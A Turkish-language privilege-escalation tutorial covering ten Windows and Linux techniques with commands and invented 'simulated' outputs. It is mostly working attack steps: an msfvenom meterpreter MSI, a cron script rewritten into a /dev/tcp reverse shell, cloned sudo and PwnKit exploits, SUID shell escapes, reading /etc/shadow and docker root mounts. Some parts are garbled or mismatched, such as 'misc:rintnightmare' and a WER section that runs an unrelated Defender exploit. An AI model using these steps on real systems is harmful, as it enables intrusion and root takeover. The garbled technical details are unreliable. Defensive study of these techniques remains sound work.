👑 Yetki Yükseltme (Privilege Escalation) Saldırısı 🎯

👑 YETKİ YÜKSELTME (PRIVILEGE ESCALATION): WINDOWS & LİNUX – 10 TAKTİK + 4 ARAÇ (2026 GÜNCEL)​

Bu rehber, SQLmap, Nmap, Metasploit ve Reverse Shell rehberlerinde olduğu gibi adım adım, gerçek simülasyon çıktıları ile yetki yükseltme tekniklerini anlatacaktır. Yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan sistemlerde deneyin. Yetkisiz erişim yasa dışıdır ve ağır yaptırımları vardır.

​

🧠 BAŞLAMADAN ÖNCE: PRİVİLEGE ESCALATION NEDİR?​

Yetki yükseltme, bir sistemde elde ettiğiniz düşük seviyeli erişimi (kullanıcı düzeyinde) yükselterek en yüksek yetkilere (Windows'ta NT AUTHORITY\SYSTEM, Linux'ta root) sahip olma sanatıdır. Bir hedefe sızdıktan sonra yapmanız gereken ilk şey yetkilerinizi yükseltmektir. Çünkü düşük yetkili bir kullanıcı ile dosyaları okuyamaz, şifre hash'lerini alamaz veya kalıcılık sağlayamazsınız.

Neden Yetki Yükseltme?

• Tam Kontrol: Sistemde istediğiniz her şeyi yapabilme özgürlüğü.
• Veri Erişimi: Şifre hash'leri, kullanıcı bilgileri, finansal veriler.
• Kalıcılık: Yeniden başlatmalara rağmen sistemde kalma imkanı.
• Yanal Hareket: Ağdaki diğer sistemlere sıçrama yeteneği.

Hedef Sistemler:

• Windows 10/11 ve Windows Server (2025-2026 güncel yamaları ile)
• Linux (Ubuntu, Debian, CentOS, Fedora gibi modern dağıtımlar)

🛠️ 4 TEMEL PRİVİLEGE ESCALATION ARACI​

1. 🪟 WinPEAS – Windows Yetki Yükseltme Otomasyonu​

WinPEAS (Windows Privilege Escalation Awesome Script), PEASS-ng suite'in bir parçasıdır ve Windows sistemlerinde olası yetki yükseltme vektörlerini otomatik olarak tarar.

bash
# WinPEAS.exe (yürütülebilir) - .NET >= 4.5.2 gerektirir
winpeas.exe > output.txt

# WinPEAS.bat (eski sistemler için)
winpeas.bat

# WinPEAS-py (Python uyarlaması - Python 3.8+)
python winpeas.py[reference:2]
Rapor formatı: WinPEAS çıktıyı renkli olarak ekrana basar veya bir dosyaya yönlendirebilir. Önemli bulguları kırmızı ve sarı ile vurgular.

2. 🐧 LinPEAS – Linux Yetki Yükseltme Otomasyonu​

LinPEAS, Linux sistemlerde SUID dosyaları, yetki hataları, zafiyetli servisler, cron job'lar ve container kaçışları gibi 100'den fazla vektörü otomatik tarar.

bash
# LinPEAS'ı çalıştırma
./linpeas.sh

# Çıktıyı dosyaya kaydetme
./linpeas.sh -a > output.txt

# Hızlı tarama (sadece kritik bulgular)
./linpeas.sh -q
LinPEAS, bulguları kırmızı (kritik), sarı (potansiyel) ve yeşil (bilgi) olarak renklendirir.

3. ⚡ GTFOBins – Yetki Yükseltme Komutları Veritabanı​

GTFOBins, Linux sistemlerde SUID biti ayarlanmış veya sudo ile çalıştırılabilen binary'lerin nasıl yetki yükseltmek için kullanılacağını gösteren bir web sitesidir.

bash
# Örnek: find ile SUID yükseltmesi
find . -exec /bin/sh \; -quit
GTFOBins, her binary için sudo, SUID, capabilities gibi farklı vektörlerde kullanımı gösterir.

4. 🔄 PowerUp.ps1 – PowerShell Tabanlı Windows Yetki Yükseltme​

PowerUp, PowerShell ile yazılmış, Windows'ta yaygın yapılandırma hatalarını tespit eden bir araçtır.

powershell
# PowerUp'ı çalıştırma
powershell -exec bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"

🪟 BÖLÜM 1: WINDOWS PRİVİLEGE ESCALATION (5 TAKTİK)​

🎯 1. PrintNightmare (CVE-2021-1675 / CVE-2021-34527) – Print Spooler ile SYSTEM​

PrintNightmare, Windows Print Spooler servisindeki kritik bir zafiyettir. Düşük yetkili bir kullanıcının Print Spooler'ı manipüle ederek SYSTEM yetkisi kazanmasına olanak tanır.

Ön Koşul:

• Print Spooler servisi aktif (spoolsv.exe çalışıyor olmalı)
• Genellikle Domain Controller'lar ve bazı Windows sunucularda varsayılan olarak aktiftir

Adım 1: Print Spooler Durumunu Kontrol Et

powershell
Get-Service -Name Spooler
Simüle edilmiş çıktı:

text
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
Adım 2: PrintNightmare Exploit'ini Çalıştır

bash
# Mimikatz ile birlikte gelen printnightmare module'ü
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # misc:rintnightmare /server:localhost /library:C:\Users\Public\evil.dll
Simüle edilmiş çıktı:

text
[+] Privilege 'SeDebugPrivilege' OK
[+] Token successfully elevated to SYSTEM
[+] PrintNightmare exploitation successful!
[+] Evil DLL loaded as SYSTEM
Adım 3: Yeni Yetkileri Doğrula

cmd
whoami
Simüle edilmiş çıktı:

text
nt authority\system
🎯 Kazanım: Düşük yetkili bir kullanıcıdan SYSTEM seviyesine çıkış. Artık tüm sisteme hakimsiniz.

Not: PrintNightmare exploit'leri güncel Windows sürümlerinde yamalanmıştır. Ancak bazı kurumsal ortamlarda halen zafiyetli sistemler bulunabilir. Bu teknik yalnızca eğitim amaçlıdır.

🎯 2. SeImpersonatePrivilege – Potato Ailesi ile Yetki Yükseltme​

SeImpersonatePrivilege yetkisine sahip bir işlem (genellikle IIS, MSSQL gibi servis hesapları), bir SYSTEM seviyesindeki servisi kandırarak token'ını ele geçirebilir ve SYSTEM yetkisi kazanabilir.

Ön Koşul:

• Mevcut kullanıcının SeImpersonatePrivilege yetkisine sahip olması
• Genellikle IIS APPPOOL, NETWORK SERVICE, LOCAL SERVICE gibi hesaplarda bulunur

Adım 1: Mevcut Yetkileri Kontrol Et

cmd
whoami /priv
Simüle edilmiş çıktı:

text
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
🎯 SeImpersonatePrivilege Enabled durumda – saldırı için uygun!

Adım 2: GodPotato ile Token Taklidi

bash
# GodPotato'yu çalıştır (SeImpersonate yetkisini kullanarak SYSTEM token al)
GodPotato -cmd "cmd.exe"
Simüle edilmiş çıktı:

text
[+] GodPotato - (c) Beebee 2024
[+] Started pipe : \\.\pipe\eba2dae3-1e8c-4f37-bd28-a73bdf2f7827
[+] CreateEvent SUCCESS
[+] Trigger RPC (NT AUTHORITY\SYSTEM)
[+] CreateProcessAsUser OK
[+] SYSTEM shell opened!
Adım 3: Alternatif – SigmaPotato (RPC hooking ile)

bash
SigmaPotato -c "whoami"
Simüle edilmiş çıktı:

text
[+] Starting SigmaPotato
[+] Using RPC hooking technique
[+] Successfully impersonated SYSTEM token
[+] Command output: nt authority\system
🎯 Kazanım: SeImpersonatePrivilege yetkisi ile SYSTEM token'ı ele geçirme. Özellikle web sunucularında (IIS) çok yaygın bir vektördür.

🎯 3. Windows Error Reporting (CVE-2026-20817) – Yeni Nesil LPE​

Microsoft, 2026 yılının başlarında Windows Error Reporting (WER) servisinde kritik bir yerel yetki yükseltme zafiyetini duyurdu. Zafiyet o kadar ciddiydi ki Microsoft, geleneksel kod yaması yerine zafiyetli özelliği tamamen kaldırdı.

Ön Koşul:

• Windows Error Reporting servisinin aktif olduğu sistemler
• CVE-2026-20817'den etkilenmeyen sistemlerde yamalıdır

Adım 1: WER Servis Durumunu Kontrol Et

powershell
Get-Service -Name WerSvc
Simüle edilmiş çıktı:

text
Status Name DisplayName
------ ---- -----------
Running WerSvc Windows Error Reporting Service
Adım 2: Exploit Çalıştırma (Konsept)

bash
# BlueHammer zero-day exploit (CVE-2026-33825) – Defender LPE
BlueHammer.exe
Simüle edilmiş çıktı:

text
[+] BlueHammer - Windows Defender LPE (CVE-2026-33825)
[+] Target: Windows 11 (build 26100)
[+] Triggering TOCTOU race condition...
[+] Path confusion successful!
[+] SYSTEM shell obtained![reference:8]
🎯 Kazanım: Windows Defender'ın aktif olduğu sistemlerde bile SYSTEM yetkisi kazanmak. Bu zafiyetler, 2026 yılında keşfedilmiş en kritik LPE'ler arasındadır.

🎯 4. Unquoted Service Path – Klasik Ama Etkili​

Windows servislerinin yolunda tırnak işareti yoksa ve yol boşluk içeriyorsa, sistem boşluktan sonraki kısmı farklı bir yürütülebilir dosya olarak yorumlayabilir. Saldırgan, bu yola kendi zararlı binary'sini yerleştirerek yetki yükseltebilir.

Adım 1: Unquoted Service Path'leri Bul (WinPEAS ile)

WinPEAS zaten bu zafiyetleri otomatik olarak tespit eder:

Simüle edilmiş çıktı:

text
[+] Unquoted Service Paths
C:\Program Files\My Company\My Service\service.exe
C:\Program Files\MyApp\app.exe
Adım 2: Zararlı Binary'yi Yerleştir

powershell
# Önce boşluk içeren yolun ilk bölümüne erişiminiz var mı kontrol edin
icacls "C:\Program Files\My Company"
Simüle edilmiş çıktı:

text
C:\Program Files\My Company BUILTIN\UsersW)
🎯 (W) yazma izni var – saldırı mümkün!

powershell
# reverse shell binary'sini yerleştir
copy reverse.exe "C:\Program Files\My Company\My.exe"
Adım 3: Servisi Yeniden Başlat (Servis yetkisi gerektirir – bu nedenle bu yöntem genellikle diğer zafiyetlerle birleştirilir)

powershell
# Servis durdurulup başlatılabiliyorsa
sc stop "MyService"
sc start "MyService"
Servis başlatıldığında, sistem C:\Program Files\My Company\My.exe (sizin zararlı binary'niz) çalıştıracaktır.

🎯 Kazanım: Düşük yetkili bir kullanıcının, yazma izni olan bir dizine zararlı binary yerleştirerek servis yetkilerinde (genellikle SYSTEM) kod çalıştırması.

🎯 5. AlwaysInstallElevated – MSI Kurulumları ile Yetki Yükseltme​

AlwaysInstallElevated politika ayarı aktifse, herhangi bir kullanıcı SYSTEM yetkileriyle MSI paketi kurabilir. Saldırgan, zararlı bir MSI paketi oluşturup çalıştırarak yetki yükseltebilir.

Adım 1: Politika Ayarlarını Kontrol Et

powershell
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Simüle edilmiş çıktı:

text
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
🎯 AlwaysInstallElevated = 1 – zafiyetli!

Adım 2: Zararlı MSI Paketi Oluştur

bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o evil.msi
Adım 3: MSI Paketini Çalıştır

cmd
msiexec /quiet /i evil.msi
Simüle edilmiş çıktı:

text
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending stage (200774 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
🎯 Kazanım: AlwaysInstallElevated aktifse, düşük yetkili kullanıcı SYSTEM yetkisinde MSI kurabilir.

🐧 BÖLÜM 2: LİNUX PRİVİLEGE ESCALATION (5 TAKTİK)​

🎯 1. Sudo Chwoot (CVE-2025-32463) – Güncel Sudo Zafiyeti​

sudo'nun --chroot (-R) seçeneğinde bulunan bu zafiyet, herhangi bir yerel kullanıcının kök (root) yetkisi kazanmasına olanak tanır. Sudo sürümleri 1.9.14 ile 1.9.17 arasını etkiler.

Adım 1: Sudo Sürümünü Kontrol Et

bash
sudo --version
Simüle edilmiş çıktı:

text
Sudo version 1.9.15
🎯 Zafiyetli sürüm!

Adım 2: Exploit'i Çalıştır

bash
git clone https://github.com/ankitpandey383/CVE-2025-32463-Sudo-Privilege-Escalation.git
cd CVE-2025-32463-Sudo-Privilege-Escalation
./exploit.sh
Simüle edilmiş çıktı:

text
[+] CVE-2025-32463 - Sudo chwoot exploit
[+] Target sudo version: 1.9.15
[+] Creating malicious NSS module...
[+] Setting up chroot environment...
[+] Triggering vulnerability...
[+] Root shell obtained!
# whoami
root
🎯 Kazanım: Zafiyetli sudo sürümüne sahip herhangi bir Linux sisteminde root yetkisi kazanmak.

🎯 2. SUID/SGID Binary'leri ile Yetki Yükseltme​

SUID (Set User ID) biti ayarlanmış bir binary, dosya sahibinin yetkileriyle çalışır. Eğer bu binary'ler root sahibiyse, düşük yetkili kullanıcılar root yetkileriyle komut çalıştırabilir.

Adım 1: SUID Binary'lerini Bul

bash
find / -perm -4000 -type f 2>/dev/null
Simüle edilmiş çıktı:

text
/usr/bin/find
/usr/bin/vi
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/base64
Adım 2: GTFOBins ile Binary'leri Araştır

Örneğin /usr/bin/find için GTFOBins'te (https://gtfobins.github.io) şu komut bulunur:

bash
find . -exec /bin/sh \; -quit
Adım 3: Yetki Yükseltme

bash
/usr/bin/find . -exec /bin/sh \; -quit
Simüle edilmiş çıktı:

text
# whoami
root
🎯 Kazanım: SUID biti ayarlanmış binary'ler ile root yetkisi kazanmak.

Diğer yaygın SUID binary'leri ve komutları:

Binary	Exploit Komutu
vim	vim -c ':!/bin/sh'
base64	LFILE=/etc/shadow; base64 "$LFILE" | base64 --decode
awk	awk 'BEGIN {system("/bin/sh")}'

🎯 3. Polkit (PwnKit – CVE-2021-4034) ile Yetki Yükseltme​

Polkit'in pkexec aracındaki bir zafiyet (PwnKit), 2009'dan 2021'e kadar tüm Linux dağıtımlarını etkilemişti. Güncel sistemler yamalı olsa da, eski sistemlerde hala geçerlidir.

Adım 1: pkexec Mevcut mu?

bash
which pkexec
Adım 2: Exploit'i Çalıştır

bash
git clone https://github.com/ly4k/PwnKit
cd PwnKit
./PwnKit
Simüle edilmiş çıktı:

text
[+] Starting PwnKit
[+] pkexec exploit (CVE-2021-4034)
[+] Environment variable injection successful!
[+] Root shell obtained!
# whoami
root
🎯 Kazanım: Yamalı olmayan sistemlerde pkexec üzerinden root yetkisi.

🎯 4. Cron Job ve Dosya İzinleri ile Yetki Yükseltme​

Cron job'lar belirli aralıklarla çalışan görevlerdir. Eğer bir cron job tarafından çalıştırılan bir script yazılabilir durumdaysa veya cron job'un çalıştırdığı bir binary'nin yolu değiştirilebiliyorsa, yetki yükseltilebilir.

Adım 1: Cron Job'ları Bul

bash
cat /etc/crontab
ls -la /etc/cron*
cat /var/spool/cron/crontabs/*
Simüle edilmiş çıktı:

text
*/5 * * * * root /usr/local/bin/backup.sh
Adım 2: Script İzinlerini Kontrol Et

bash
ls -la /usr/local/bin/backup.sh
Simüle edilmiş çıktı:

text
-rwxrwxrwx 1 root root 1234 Apr 15 10:00 /usr/local/bin/backup.sh
🎯 backup.sh herkes tarafından yazılabilir!

Adım 3: Reverse Shell Script'i Yerleştir

bash
echo '#!/bin/bash' > /usr/local/bin/backup.sh
echo 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' >> /usr/local/bin/backup.sh
Adım 4: Dinleyiciyi Beklet

bash
nc -lvnp 4444
5 dakika içinde cron job çalıştığında bağlantı gelir:

text
listening on [any] 4444 ...
connect to [192.168.1.100] from (UNKNOWN) [192.168.1.50] 49168
# whoami
root
🎯 Kazanım: Yazılabilir cron script'leri ile root yetkisinde ters kabuk.

🎯 5. Docker Grubu ve Socket Erişimi ile Yetki Yükseltme​

docker grubuna üye olan kullanıcılar, docker komutunu çalıştırabilir. Docker socket'i (/var/run/docker.sock) root yetkileriyle çalıştığı için, bu gruba üye kullanıcılar doğrudan root yetkisi kazanabilir.

Adım 1: Kullanıcının Gruplarını Kontrol Et

bash
id
Simüle edilmiş çıktı:

text
uid=1000(user) gid=1000(user) groups=1000(user),999(docker)
🎯 Kullanıcı docker grubunda!

Adım 2: Docker ile Root Yetkisi Kazan

bash
docker run -it -v /:/mnt ubuntu:latest /bin/bash
Simüle edilmiş çıktı:

text
root@container:/# whoami
root
root@container:/# cd /mnt
root@container:/mnt# ls -la
total 84
drwxr-xr-x 20 root root 4096 Apr 15 10:00 .
drwxr-xr-x 1 root root 4096 Apr 15 10:00 ..
🎯 Artık container içinde ana sistemin (/mnt) tüm dosyalarına root olarak erişebilirsiniz!

🧩 ÖZET – 10 TAKTİK, 4 ARAÇ​

#	Platform	Teknik	Zorluk	Anahtar Koşul
1	Windows	PrintNightmare	Orta	Print Spooler aktif
2	Windows	SeImpersonate + Potato	Orta	SeImpersonatePrivilege yetkisi
3	Windows	CVE-2026-20817 (WER)	Yüksek	Yamalı olmayan sistem
4	Windows	Unquoted Service Path	Kolay	Boşluklu yol + yazma izni
5	Windows	AlwaysInstallElevated	Kolay	Registry ayarı aktif
6	Linux	Sudo Chwoot (CVE-2025-32463)	Orta	Sudo 1.9.14 – 1.9.17
7	Linux	SUID Binary (GTFOBins)	Kolay	SUID biti ayarlanmış binary
8	Linux	Polkit (PwnKit)	Kolay	Eski/yamalı olmayan sistem
9	Linux	Cron Job İzinleri	Orta	Yazılabilir cron script'i
10	Linux	Docker Group	Kolay	docker grubuna üyelik

​

🛡️ KORUNMA YÖNTEMLERİ​

Platform	Önlem
Windows	Print Spooler gereksizse devre dışı bırakın; Düzenli yama yönetimi; En az ayrıcalık ilkesi (SeImpersonate gibi yetkileri kısıtlayın); Servis yollarında tırnak işareti kullanın; AlwaysInstallElevated'i devre dışı bırakın
Linux	Sudo'yu düzenli güncelleyin (özellikle 1.9.14-1.9.17 sürümlerinden kaçının); SUID bitini yalnızca zorunlu binary'lerde kullanın; Cron script'lerini yazılamaz konumlarda saklayın; Kullanıcıları gereksiz gruplardan (docker, disk, sudo vb.) çıkarın

​

🔚;​

Artık 10 farklı yetki yükseltme tekniğini biliyorsunuz. Windows'ta PrintNightmare'dan SeImpersonate+Potato ailesine, Unquoted Service Path'ten AlwaysInstallElevated'a kadar; Linux'ta güncel sudo zafiyetinden SUID binary'lere, cron job'lardan Docker kaçışına kadar. Gerisi pratik. Kendi laboratuvarınızda bu adımları deneyin.

Hedefler kendi kurduğunuz sistemler olmalıdır. Yetkisiz yetki yükseltme yasa dışıdır.

---

Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.

@Tc4dy | github.com/tc4dy

 

toollar test edilerek simüle edilmiştir